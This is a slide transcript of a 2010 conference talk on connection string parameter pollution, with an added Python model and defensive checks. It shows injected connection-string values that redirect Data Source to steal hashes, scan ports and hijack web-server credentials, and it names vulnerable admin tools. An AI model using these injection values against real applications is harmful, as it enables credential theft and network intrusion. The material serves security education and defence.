Connection String Parameter Pollution Attacks
Talk delivered by Chema Alonso and Jose Palazon "Palako" in BlackHat DC 2010 about Connection String Injection Parameter Pollution attacks.

    Presentation Transcript

    • Chema Alonso & Palako
      Informática 64
    • Connection Strings
      Define the way an application connects to a data repository
      There are connection strings for:
      Relational Databases (MSSQL, Oracle, MySQL, …)
      LDAP Directories
      Files
      Etc…
    • Database Connection Strings
      Data Source = myServerAddress;
      InitialCatalog = myDataBase;
      User Id = myUsername;
      Password = myPassword;
    • DB Connection build up
    • Google Hacking
    • Google Hacking
    • UDL (Universal Data Links) Files
    • How a Web app connects to the DB
      Operating System Accounts
      Data Source = myServerAddress;
      InitialCatalog = myDataBase;
      User Id =;
      Password =;
      Integrated Security = SSPI/True/Yes;
      Database Credentials
      Data Source = myServerAddress;
      InitialCatalog = myDataBase;
      User Id = myUsername;
      Password = myPassword;
      Integrated Security = No;
    • Users authenticated by the Web App
      The web application manages the login process
      Syslogins
      1.- The web application connects to the database using its own credentials.
      2.- Asks the user for login information.
      3.- Checks the login information against the info stored in a custom users table.
      Connection string
      Custom users table
      Select id from users
      Database Engine
      App running on Web Server
    • Users authenticated by the Database
      The database engine manages the login process
      1.- The web application asks for credentials.
      2.- A connection string is composed with the credentials to connect to the database.
      3.- Roles and permissions are limited by the user used in the connection string.
      Syslogins
      Connection string
      Database Engine
      App running on Web Server
    • Connection String Attacks
      It's possible to inject parameters into connection strings using semicolons as a separator
      Data Source = myServerAddress;
      InitialCatalog = myDataBase;
      Integrated Security = NO;
      User Id = myUsername;
      Password = myPassword; Encryption = Off;
    • ConnectionStringBuilder
      Available in .NET Framework 2.0
      Builds secure connection strings using parameters
      It's not possible to inject into the connection string
    • Are people aware of this?
    • Connection String Parameter Pollution
      The goal is to inject parameters into the connection string, whether they already exist or not
      If a parameter is duplicated, the last value wins
      This behavior allows an attacker to completely overwrite the connection string, and therefore to manipulate how the application works and how it authenticates
    • Pollutable Behavior
      Param1=Value A
      Param2=Value B
      Param1=Value C
      Param2=Value D
      DB Connection Object
      Param1
      Param2
    • What can be done with CSPP? Overwrite a parameter
      Data Source=DB1
      UID=sa
      Data Source=DB2
      password=Pwnd!
      DB Connection Object
      Data Source
      UID
      password
    • Scanning the DMZ
      Development Database 1
      Financial Database
      Test Database
      Forgotten Database
      Internet
      FW
      Web app vulnerable to CSPP
      Production Database
      Data Source
    • Port Scanning a Server
      Production Database Server
      FW
      Data Source
      DB1,80
      Internet
      Web app vulnerable to CSPP
      DB1,21
      DB1,25
      DB1,1445
    • What can be done with CSPP? Add a parameter
      Data Source=DB1
      UID=sa
      Integrated Security=True
      password=Pwnd!
      DB Connection Object
      Data Source
      UID
      password
    • CSPP Attack 1: Hash stealing
      1.- Run a Rogue Server on an accessible IP address:
      Rogue_Server
      2.- Activate a sniffer to catch the login process
      Cain/Wireshark
      3.- Overwrite the Data Source parameter
      Data_Source=Rogue_Server
      4.- Force Windows Integrated Authentication
      Integrated Security=true
    • CSPP Attack 1: Hash stealing
      Original connection string:
      Data source = SQL2005; initial catalog = db1;
      Integrated Security=no; user id=+'User_Value'+;
      Password=+'Password_Value'+;
      After pollution:
      Data source = SQL2005; initial catalog = db1;
      Integrated Security=no; user id=;Data Source=Rogue_Server;
      Password=;Integrated Security=True;
    • CSPP 1: ASP.NET Enterprise Manager
    • CSPP Attack 2: Port Scanning
      1.- Duplicate the Data Source parameter, setting the target server and target port to be scanned. Data_Source=Target_Server,target_Port
      2.- Check the error messages:
      - No TCP Connection -> Port is closed
      - No SQL Server -> Port is open
      - Invalid Password -> SQL Server there!
    • CSPP Attack 2: Port Scanning
      Original connection string:
      Data source = SQL2005; initial catalog = db1;
      Integrated Security=no; user id=+'User_Value'+;
      Password=+'Password_Value'+;
      After pollution:
      Data source = SQL2005; initial catalog = db1;
      Integrated Security=no; user id= ;Data Source=Target_Server, Target_Port;
      Password=;Integrated Security=True;
    • CSPP 2: myLittleAdmin
      Port is Open
    • CSPP 2: myLittleAdmin
      Port is Closed
    • CSPP Attack 3: Hijacking Web Credentials
      1.- Duplicate the Data Source parameter pointing to the target SQL Server
      Data_Source=Target_Server
      2.- Force Windows Authentication
      Integrated Security=true
      3.- The application pool the web app runs under will send its own credentials in order to log in to the database engine.
    • CSPP Attack 3: Hijacking Web Credentials
      Original connection string:
      Data source = SQL2005; initial catalog = db1;
      Integrated Security=no; user id=+'User_Value'+;
      Password=+'Password_Value'+;
      After pollution:
      Data source = SQL2005; initial catalog = db1;
      Integrated Security=no; user id=;Data Source=Target_Server;
      Password=;Integrated Security=true;
    • CSPP Attack 3: Web Data Administrator
    • CSPP Attack 3: myLittleAdmin/myLittleBackup
    • CSPP Attack 3: ASP.NET Enterprise Manager
    • Other Databases
      MySQL
      Does not support Integrated Security, although it's still possible to manipulate the behavior of the web application:
      Port Scanning
      Connect to internal/testing/development Databases
      Steal credentials
      Oracle
      Supports integrated authentication running on Windows and UNIX/Linux servers
      It's possible to perform all the described attacks:
      Hash stealing
      Port Scanning
      Hijacking Web credentials
      It's also possible to elevate a connection to sysdba in order to shut down/start up an instance
    • Demo
    • Scanner
      Proof of concept to test your network
      Try a hijacking web credentials attack
      Written in ASP.NET C#
      Free download (code included, of course)
      http://www.informatica64.com/csppScanner.aspx
    • CSPP Scanner
    • Scanner CSPP: Attacks
    • Demo
    • myLittleAdmin/myLittleBackup
      myLittleTools released a security advisory and a patch about this
    • ASP.NET Enterprise Manager
      ASP.NET Enterprise Manager is "abandoned", but it's still being used in a lot of web Control Panels.
      Fix the code yourself
    • ASP.NET Web Data Administrator
      ASP.NET Web Data Administrator is secure on the CodePlex web site, but not on the Microsoft web site, where an insecure old version was published
    • Countermeasures
      Harden your firewall
      Outbound connections
      Review your internal accounts policy
      Web application
      Web server
      Database Engine
      Use ConnectionStringBuilder
      Filter the ;)
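    The "last value wins" behaviour from the Pollutable Behavior and Hash stealing slides, and the "filter the ;" countermeasure above, modelled in Python as an added example (not code from the talk or its scanner). The connection-string template and the Rogue_Server placeholder are taken from the slides; the parser is a simplified model of ADO.NET key handling and does not implement its quoting rules.

    ```python
    """Model of connection-string parameter pollution (CSPP) and two defensive checks."""
    from collections import Counter
    import re


    def normalize_key(key: str) -> str:
        # ADO.NET ignores case and whitespace in keys: 'Data Source' == 'datasource'
        return re.sub(r"\s+", "", key).lower()


    def parse_connection_string(cs: str) -> dict:
        """Split 'key=value;...' pairs; a repeated key keeps its LAST value.
        This is the pollutable behaviour the slides describe."""
        params = {}
        for part in cs.split(";"):
            if "=" not in part:
                continue  # empty fragments left by ';;' are skipped
            key, _, value = part.partition("=")
            params[normalize_key(key)] = value.strip()
        return params


    def duplicated_keys(cs: str) -> set:
        """Detection check: keys that occur more than once after normalisation.
        A legitimately built string never repeats a key, so any hit is suspicious."""
        counts = Counter(normalize_key(p.partition("=")[0])
                         for p in cs.split(";") if "=" in p)
        return {k for k, n in counts.items() if n > 1}


    # Template from the Hash stealing slide; user and password are concatenated in.
    TEMPLATE = ("Data source = SQL2005; initial catalog = db1; "
                "Integrated Security=no; user id={user}; Password={password};")


    def build_by_concatenation(user: str, password: str) -> str:
        """Vulnerable pattern: credentials are pasted straight into the template."""
        return TEMPLATE.format(user=user, password=password)


    def build_filtered(user: str, password: str) -> str:
        """Countermeasure from the slides ('filter the ;'): refuse any value that
        carries the separator instead of letting it open a new parameter.
        (SqlConnectionStringBuilder achieves the same by quoting such values.)"""
        for value in (user, password):
            if ";" in value:
                raise ValueError("connection-string separator in credential value")
        return TEMPLATE.format(user=user, password=password)


    if __name__ == "__main__":
        polluted = build_by_concatenation(";Data Source=Rogue_Server;",
                                          ";Integrated Security=True;")
        print(parse_connection_string(polluted))  # Data Source and Integrated Security overwritten
        print(duplicated_keys(polluted))          # {'datasource', 'integratedsecurity'}
    ```
    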
    • Questions?
      Contact
      Chema Alonso
      chema@informatica64.com
      http://www.informatica64.com
      http://elladodelmal.blogspot.com
      http://twitter.com/chemaalonso
      José Palazón “Palako”
      palako@lateatral.com
      Authors
      Chema Alonso
      Manuel Fernández “The Sur”
      Alejandro Martín Bailón
      Antonio Guzmán